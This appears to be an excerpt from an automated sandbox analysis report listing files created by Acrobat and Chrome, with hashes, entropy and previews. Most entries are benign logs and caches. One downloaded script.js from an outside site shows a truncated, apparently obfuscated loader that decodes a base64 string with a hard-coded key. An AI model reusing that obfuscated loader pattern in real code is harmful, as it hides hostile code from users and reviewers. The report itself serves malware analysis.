                                                                        SHA-256:CDA8C214F5E42ED5DE419CCEDFEFEC63C0323BDF36079F145CEDA12901D9C22D
                                                                        SHA-512:D478038E00792D6F36A8488674BD0687D6B684BCB921BB3B2AA099DC2FBE0ECD4FCF0D4B71F271FB79B9F05F05BA34BE6149C778477ECA631B615DCEF61FCB8F
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4
                                                                        Entropy (8bit):0.8112781244591328
                                                                        Encrypted:false
                                                                        SSDEEP:3:e:e
                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                        Malicious:false
                                                                        Preview:....
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):2817
                                                                        Entropy (8bit):5.132144840281952
                                                                        Encrypted:false
                                                                        SSDEEP:24:Yj0VvrqahaayWrX3WxLqX7T63Jq7j5tPcj0Sl+ah2s2LS/CvsafdBXL+5ors69/7:Yo1PX38LST6M5tGsiRpHa1BXqWrP9D
                                                                        MD5:CDBB5FDCB71AACDE46082FC47C90FC84
                                                                        SHA1:6A5698321AA3013F0B89CB31C35151D764859C6E
                                                                        SHA-256:F54B2BB654EAC765370A39A220A8AC9481076ACCB3CD3091BFF13E6A91F35A36
                                                                        SHA-512:398B89C8C67CE3487F8390D09ADC08290E283355063392CC8F0A574D3FEB242C0CB5984548FEDC8C32666810B2D6E9D3591E86273115E3E385FFB8B0B70FE02C
                                                                        Malicious:false
                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"37a7bd5367e16524dedb70fb6242129b","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1733244574000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"ad10ae54755913fc7c0279b5a0c78060","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1733244574000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"031f3d86525ea579058a7afeab2d9e29","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1733244574000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"3dea8b7818c308ac64a922d1f501b872","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1733244574000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"7adab3f30a546024e8ae20800d52118e","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1733244574000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"a6e9fc9ccb10e173696055efdc45d686","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                        Category:dropped
                                                                        Size (bytes):12288
                                                                        Entropy (8bit):1.1866218283676706
                                                                        Encrypted:false
                                                                        SSDEEP:48:TGufl2GL7msEHUUUUUUUUXqSvR9H9vxFGiDIAEkGVvpbM:lNVmswUUUUUUUUXq+FGSItXM
                                                                        MD5:4C70142CB05AE232C283DAEE10F64C51
                                                                        SHA1:BEAE42CC99AE256CBE7D9BF3400E8B20CDED7068
                                                                        SHA-256:FE0B236B7AACE18732AEF5909327F0C6B830FC003CFC37B27E93120E92866F23
                                                                        SHA-512:BACF12EDA960FEEBED289B7B08D0C2EE5751AA966A5346F0245AB3466B66C1656FE26C802469F37E993A7325707DBC634EF1173D7F27FFAC8B323F0CFC4E8B8E
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:SQLite Rollback Journal
                                                                        Category:dropped
                                                                        Size (bytes):8720
                                                                        Entropy (8bit):1.6064779823542377
                                                                        Encrypted:false
                                                                        SSDEEP:48:7M1jKUUUUUUUUUUXIvR9H9vxFGiDIAEkGVvhqFl2GL7msD:7w2UUUUUUUUUUXgFGSItzKVmsD
                                                                        MD5:C334E053F68CFFB5381526ECEEE2DF64
                                                                        SHA1:DDFEB23E17F095B38C5C626048A30EA033108F64
                                                                        SHA-256:A6A8F1D2C81E6DB85B35982647305D09475412242E414F63E86E7363880CBCA6
                                                                        SHA-512:520355C6A8A2BF901E1AD241E5D65A9CEEBBCC00D1F117F96D6A67A938A793B23EAAA6B158562DBF29FA27A745735C16C00A7A0747426C441CC3F214EB05EDDD
                                                                        Malicious:false
                                                                        Preview:.... .c..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):66726
                                                                        Entropy (8bit):5.392739213842091
                                                                        Encrypted:false
                                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEgdunhB1MCYCBAFR9rX9yXWdX6gFssdYyu:6a6TZ44ADEMnhB1MiBWR9h6gsqK
                                                                        MD5:D73D6B56C77B5E957F06E0B74911A9D5
                                                                        SHA1:F019E370C03619969AE779BFA6ADA737E8C412F7
                                                                        SHA-256:1D4F2B2903A91745359B54809F32C2CA2CA21FA822994B52A5CD4DC7393BC1BA
                                                                        SHA-512:BEDF7095DBDBA78EEA708C87FC03B02481612A32514FC0167ED3E3D0AA19D8F61BAE49135806EBE3FF86A7A13592E4829E866290E197530B9164DCA99876BA5D
                                                                        Malicious:false
                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):246
                                                                        Entropy (8bit):3.5162684137903053
                                                                        Encrypted:false
                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K82hlAaxCwlYH:Qw946cPbiOxDlbYnuRKXhlLLlYH
                                                                        MD5:AE8CF5A8B3351339B75B0DF401951163
                                                                        SHA1:1193879AE3F98F98482EEFB8EC916592477A5291
                                                                        SHA-256:DDE663A94902BDBBDF36A603EE407A00C24271E048A4D8F0CBA616C601617FCB
                                                                        SHA-512:580CDDC8E35D950F8064BB45D2CD6484569F885C3F2E9B5F1C1D1D0DE92382D5A93C753BE7D7E5F3A1C3E000D3F46AAF2EF403F8D05A1827D1F14A778B898962
                                                                        Malicious:false
                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.3./.1.2./.2.0.2.4. . .1.1.:.4.9.:.3.0. .=.=.=.....
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:PDF document, version 1.6, 0 pages
                                                                        Category:dropped
                                                                        Size (bytes):358
                                                                        Entropy (8bit):5.079873043268383
                                                                        Encrypted:false
                                                                        SSDEEP:6:IngVMrexJzJT0y9VEQIFVmb/eu2g/86S1kxROOYRD2mjRDJCSyAAO:IngVMre9T0HQIDmy9g06JXiPJlX
                                                                        MD5:EDC71311010079C7D6F2A2777FBB57B9
                                                                        SHA1:75E6C2F73E334651C95C91C367A250803E7485F7
                                                                        SHA-256:23CD16B273B92F407CD51FCB0A3013488D932BC11A63DCA12D45DA874642AA15
                                                                        SHA-512:07094CA4A58B3D7A7E973987CDF05CEC689879B9D8010C754DFF01809949623B8DE0DAFB1A015C5A4BE30F983C09C06032F9D97383F4CC80323FC0D92B3AFD8A
                                                                        Malicious:false
                                                                        Preview:%PDF-1.6.%......1 0 obj.<</Pages 2 0 R/Type/Catalog>>.endobj.2 0 obj.<</Count 0/Kids[]/Type/Pages>>.endobj.3 0 obj.<<>>.endobj.xref..0 4..0000000000 65535 f..0000000016 00000 n..0000000061 00000 n..0000000107 00000 n..trailer..<</Size 4/Root 1 0 R/Info 3 0 R/ID[<1CC5615E88EAAD46BB62839A54EE1F30><1CC5615E88EAAD46BB62839A54EE1F30>]>>..startxref..127..%%EOF..
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:ASCII text, with very long lines (393)
                                                                        Category:dropped
                                                                        Size (bytes):16525
                                                                        Entropy (8bit):5.345946398610936
                                                                        Encrypted:false
                                                                        SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                        MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                        SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                        SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                        SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                        Malicious:false
                                                                        Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):16603
                                                                        Entropy (8bit):5.362033050740469
                                                                        Encrypted:false
                                                                        SSDEEP:384:by+fVxQiY0P3Sv8WsSVy8Ck8zAyoUoiuVNTKYcaVAwJiwEpJnAbY5m58Bu47Fg4N:T+I7
                                                                        MD5:D2BE4DAA8C68A8B254C1C8E3B7F4AC0C
                                                                        SHA1:645AC7762F9BF45C5872C92854CFEF8C26714A2E
                                                                        SHA-256:8C92C24820BAF63AAAF8F44CB2163BC21FCB38EFBBD1D7433873D80F6769C751
                                                                        SHA-512:CB9BC410A792C15C41016406162ED8CD74D9A7FF6797EA23FA32992D539429003B26970230B378A031758AB230F7AA778FD11ED1966BE973F4C1A116F0B9EB5F
                                                                        Malicious:false
                                                                        Preview:SessionID=c975d8e0-fe0a-4f61-ba80-157567b2bd09.1733244565026 Timestamp=2024-12-03T11:49:25:026-0500 ThreadID=7668 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=c975d8e0-fe0a-4f61-ba80-157567b2bd09.1733244565026 Timestamp=2024-12-03T11:49:25:027-0500 ThreadID=7668 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=c975d8e0-fe0a-4f61-ba80-157567b2bd09.1733244565026 Timestamp=2024-12-03T11:49:25:027-0500 ThreadID=7668 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=c975d8e0-fe0a-4f61-ba80-157567b2bd09.1733244565026 Timestamp=2024-12-03T11:49:25:027-0500 ThreadID=7668 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=c975d8e0-fe0a-4f61-ba80-157567b2bd09.1733244565026 Timestamp=2024-12-03T11:49:25:028-0500 ThreadID=7668 Component=ngl-lib_NglAppLib Description="SetConf
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):29752
                                                                        Entropy (8bit):5.390544343324066
                                                                        Encrypted:false
                                                                        SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rR:t
                                                                        MD5:4D09A07D1B9EBD2A5791D50BA400834F
                                                                        SHA1:DB76404F7217A02A7180D253CF1BB7BDD17495E3
                                                                        SHA-256:5015C930CE2793405F028D6C95F1BE8283AC3D2004CB9F2EE604B2112514CD83
                                                                        SHA-512:B359414A9931379CA751B742D3B4F1A0E6A49FE8B21CBAB3AF7E212FAA4EB0C503B5D14122CA722CD6266F0F6E399758F3324C9E276CAB3D4A8860B6DDCF7E53
                                                                        Malicious:false
                                                                        Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
                                                                        Category:dropped
                                                                        Size (bytes):1407294
                                                                        Entropy (8bit):7.97605879016224
                                                                        Encrypted:false
                                                                        SSDEEP:24576:6Dbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WL07oXGZGwYIGNPJF:cb3mlind9i4ufFXpAXkrfUs0jWLxXGZY
                                                                        MD5:279B811F8FB7ED83618C0B37825CCF25
                                                                        SHA1:5718DA0EF8F5A938CB88800665F18C9B805208B2
                                                                        SHA-256:2AF4D3CE45FACE3A6DF83A17E90912767BE01A6F2C96AD8B3F270FDB13F77E46
                                                                        SHA-512:74A736359646F91F28AC496DFFF249D0E5B005AA6BB34DAFDDE3C2A29B70D52E6F865239579AC94540AAB0D20BFC03AE6501814358D2122FCB60A4591213A9B9
                                                                        Malicious:false
                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                        Category:dropped
                                                                        Size (bytes):386528
                                                                        Entropy (8bit):7.9736851559892425
                                                                        Encrypted:false
                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                        Malicious:false
                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                        Category:dropped
                                                                        Size (bytes):758601
                                                                        Entropy (8bit):7.98639316555857
                                                                        Encrypted:false
                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                        MD5:3A49135134665364308390AC398006F1
                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                        Malicious:false
                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                        Category:dropped
                                                                        Size (bytes):1419751
                                                                        Entropy (8bit):7.976496077007677
                                                                        Encrypted:false
                                                                        SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                                        MD5:95F182500FC92778102336D2D5AADCC8
                                                                        SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                                                                        SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                                                                        SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                                                                        Malicious:false
                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):16
                                                                        Entropy (8bit):3.75
                                                                        Encrypted:false
                                                                        SSDEEP:3:HxMCR:iY
                                                                        MD5:33EF2868BE6AA314700E14BD49C768F7
                                                                        SHA1:31F61F2918D49D189AD92FB84D8C82B96C075FBE
                                                                        SHA-256:A06CB250708EDB37CB17B7ED1019F55808FE237E5B1700722EDF0F451B9ABF92
                                                                        SHA-512:1EB3341CE08D51A32F86C61709C6BCFA847761603E5F90584171A29CEDBC78308B9CDCEA9F636107749E76192E5208F17E36A6B59AC6EE0551535A9E8E57959A
                                                                        Malicious:false
                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnNhspww4z4xBIFDUMF7i4=?alt=proto
                                                                        Preview:CgkKBw1DBe4uGgA=
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (8794)
                                                                        Category:downloaded
                                                                        Size (bytes):8831
                                                                        Entropy (8bit):5.2261593995743105
                                                                        Encrypted:false
                                                                        SSDEEP:192:VpqgJqqWFV1NAAacnKflfbMXv7RcJncmoMO8ejok:Vp3JoF+eKpMXdincmovjr
                                                                        MD5:4C1820154EC47B89CA1BB86380227ADF
                                                                        SHA1:54EDB576DB3B6FBEB0DD9E06876F842B46E3F0D9
                                                                        SHA-256:C603134B41351BA0664DF64D8CBC553080C23E608E84DA12F9250EC53E4B8352
                                                                        SHA-512:DB5748AC920DA1B0321AC6B3B91549B00C65316EF960678A28FB56CD40E21C8171E49AE8CEA8A490456297169272A697B49C319CF64DE2613CB9AF6910E1DAD2
                                                                        Malicious:false
                                                                        URL:https://apnasofa.com/episode/script.js
                                                                        Preview:var key = "secretkey";.var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US0pWUyIGBkURBgQQH0UFAAoZSzArP0ULExYcYUVZFRANEREdBAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0VZUxhpUkUJYW9ZU0pMUicVGABPR0UGHAYbDwBZFRANEREdBAtzU0UFBwsXHwwWHUUBExYRXVE8HQYMFgBcGBELWkUYeEVUS0VZUxERC0UPYUVZU0VDUkVUS0ULFhEWAAtUCREWEk0QBhddUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZABERSW9US0VZU0UeeEVUFm9zU0VMXUU9BQwNGgQPGx8RSwILEgdDFwgVAglzU0UCBxEbDBcYEQcGFiAZCgwVU1hDFQAALggYGgklAAoZPjc1W0xYeEVUYUVZXEpDPgoXChEQHAtDNgAADgYNGgoNeEVUChYAHQZDFBAaCBEQHAtDFQAAJwoaEhEKHQs9BQMWW0xDCW9US0VZU0UXABxUEG9ZU0VDUkVUS0VZXEpDIhcdBgQLCkUPHQYVHw
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 1871 x 308, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):21327
                                                                        Entropy (8bit):7.8373557915707295
                                                                        Encrypted:false
                                                                        SSDEEP:384:dOKtgdrfxBB7uIPC/gwqaN+v8K6YgEdjyXiIEbXZwkNYhJP8OgL:AK8jxbuT//NNU4X7EbXBNU8OgL
